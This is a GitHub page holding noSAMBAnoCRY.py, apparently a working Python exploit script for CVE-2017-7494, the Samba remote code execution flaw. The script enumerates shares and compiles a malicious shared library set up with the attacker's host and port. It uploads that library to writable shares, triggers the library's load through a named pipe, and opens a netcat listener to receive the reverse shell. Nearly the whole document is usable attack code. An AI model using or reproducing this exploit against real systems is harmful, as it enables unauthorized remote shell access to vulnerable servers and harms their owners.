-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathnoSAMBAnoCRY.py
201 lines (159 loc) · 5.88 KB
/
noSAMBAnoCRY.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
#!/usr/bin/python
# -*- coding: utf-8 -*-
# CVE-2017–7494
# Exploit Title: Samba 4.5.9, 3.5, 3.6 Unauthenticated Remote Code Execution
# (m4ud)
from impacket.smbconnection import SMBConnection
from impacket.dcerpc.v5 import transport, srvs
import random
from optparse import OptionParser
import re
import os
from time import sleep
import emoji
from pyfiglet import Figlet
import subprocess
f = Figlet(font='slant')
print f.renderText('noSAMBAnoCRY')
#print """
# _____ ___ __ _______ ___ ____________ __
# ____ ____ / ___// | / |/ / __ )/ | ____ ____ / ____/ __ \ \/ /
# / __ \/ __ \\__ \/ /| | / /|_/ / __ / /| | / __ \/ __ \/ / / /_/ /\ /
# / / / / /_/ /__/ / ___ |/ / / / /_/ / ___ |/ / / / /_/ / /___/ _, _/ / /
#/_/ /_/\____/____/_/ |_/_/ /_/_____/_/ |_/_/ /_/\____/\____/_/ |_| /_/
#"""
CONFIG_H = """#define SHELL_PORT %s
#define SHELL_HOST "%s"
#define SHELL_BINARY "%s"
#define USE_OLD_ENTRYPOINT %s
"""
rName='*SMBSERVER'
lib_name = "evilLibx64.so"
class SmbExploder:
def __init__(self, options):
self.rhost = options.rhost
self.rport = options.rport
self.lhost = options.lhost
self.lport = options.lport
self.user = options.user
self.hashes = options.hashes
self.smb = SMBConnection(rName, self.rhost, sess_port=int(self.rport))
self.shell = options.shell
self.cBin = options.cBin
self.arch = options.arch
self.old = options.old
if self.user is None:
self.user = ""
self.pwd = options.pwd
if self.pwd is None:
self.pwd = ""
if self.hashes is not None:
self.lmhash, self.nthash = options.hashes.split(':')
else:
self.lmhash = ''
self.nthash = ''
def SMBpath(self, path):
pos = path.find(":")
if pos > -1:
path = path[pos+1:]
path = path.replace("\\", "/")
return path
def libsArch(self, sPath, lib_name):
module = sPath + "/" + lib_name
self.execName = os.path.basename(lib_name)
self.execFile = open(lib_name, 'rb')
return module
def get_lib(self):
if (len(self.cBin) > 1) == 1:
print "[ ! ] Using Custom binary, hope payload works. [ ! ]"
return True
with open("config.h", "wb") as f:
f.write(CONFIG_H % (self.lport, self.lhost, self.shell, self.old))
print "[ + ] Compiling evil lib... [ + ]"
ret = os.system("make")
return ret == 0
def login(self):
self.smb = SMBConnection(rName, self.rhost, sess_port=int(self.rport))
self.smb.login(user=self.user, password=self.pwd, lmhash=self.lmhash, nthash=self.nthash)
def copy_lib(self, lib_name):
self.login()
rpctransport = transport.SMBTransport(rName, self.rhost, filename=r'\srvsvc', smb_connection=self.smb)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(srvs.MSRPC_UUID_SRVS)
resp = srvs.hNetrShareEnum(dce, 2)
for share in resp['InfoStruct']['ShareInfo']['Level2']['Buffer']:
sName = share['shi2_netname'][:-1]
sPath = self.SMBpath(share['shi2_path'][:-1])
k = str(sName) +":"+ str(sPath)
sName, sPath = k.split(':')
j = sName.replace('IPC$', '')
j = sName.replace('print$', '')
j = str(j)
shares = "".join([s for s in j.splitlines(True) if s.strip("\r\n")])
if self.arch == "1":
lib_name = "evilLibx86.so"
module = self.libsArch(sPath, lib_name)
elif self.arch == "2":
lib_name = "evilLibi686.so"
module = self.libsArch(sPath, lib_name)
if not self.cBin:
lib_name = lib_name
module = self.libsArch(sPath, lib_name)
else:
lib_name = self.cBin
module = self.libsArch(sPath, lib_name)
# shares = os.linesep.join([s for s in j.splitlines() if s])
for sharez in shares.splitlines():
print "[ + ] Using %s [ + ]" % lib_name
print "[ + ] Copying lib '%s' to share '%s' [ + ]" % (lib_name, sharez)
self.smb.putFile(sharez, self.execName, self.execFile.read)
return module
def load_exp(self):
module = self.copy_lib(lib_name)
if self.old == "1":
module = '\\\PIPE\\' + module
print "module: %s" % module
print "[ " + emoji.emojize(':skull:') + " ] Loading evil module [ " +emoji.emojize(':skull:') +" ]"
f = subprocess.Popen(["nc", "-lvnp", str(self.lport)])
stringbinding = r'ncacn_np:%s[\pipe\%s]'% (self.rhost, module)
stb = transport.DCERPCStringBinding(stringbinding)
naddr = stb.get_network_address()
rpctransport = transport.SMBTransport(naddr, filename = module, smb_connection = self.smb)
dce = rpctransport.get_dce_rpc()
dce.connect()
f.communicate()
def start_exp(self):
self.get_lib()
self.load_exp()
def main():
pr = OptionParser()
pr.add_option("-r", "--rhost", dest="rhost", help="target ip address")
pr.add_option("-p", "--rport", dest="rport", default=445, help="target port")
msg = "LHOST IP Reverse shell!"
pr.add_option("--lhost", dest="lhost", help=msg)
msg = "LPORT for Reverse shell!"
pr.add_option("--lport", dest="lport", default=60312, help=msg)
msg = "Username"
pr.add_option("-u", "--user", dest="user", help=msg)
msg = "Pwd"
pr.add_option("-P","--pwd", dest="pwd", help=msg)
msg ="Hashes NTLM"
pr.add_option("--hashes",dest ="hashes", action="store", help=msg)
msg = "Shell to use (by default /bin/sh)"
pr.add_option("-s", "--shell", dest="shell", default="/bin/sh", help=msg)
msg = "To run a custom .so"
pr.add_option("-c", "--cbin", dest="cBin", default="", help=msg)
msg = "Choose reverse Shell arch, 1 = x32 and 2 = i686 (Default is x86_64)"
pr.add_option("-a", "--arch", dest="arch", help=msg)
msg = "For Samba 3.5"
pr.add_option("-o", "--old", dest="old", help=msg)
(options, args) = pr.parse_args()
if options.rhost:
exp = SmbExploder(options)
if exp.start_exp():
print "Some many questions, did it work out???"
else:
pr.print_help()
if __name__=="__main__":
main()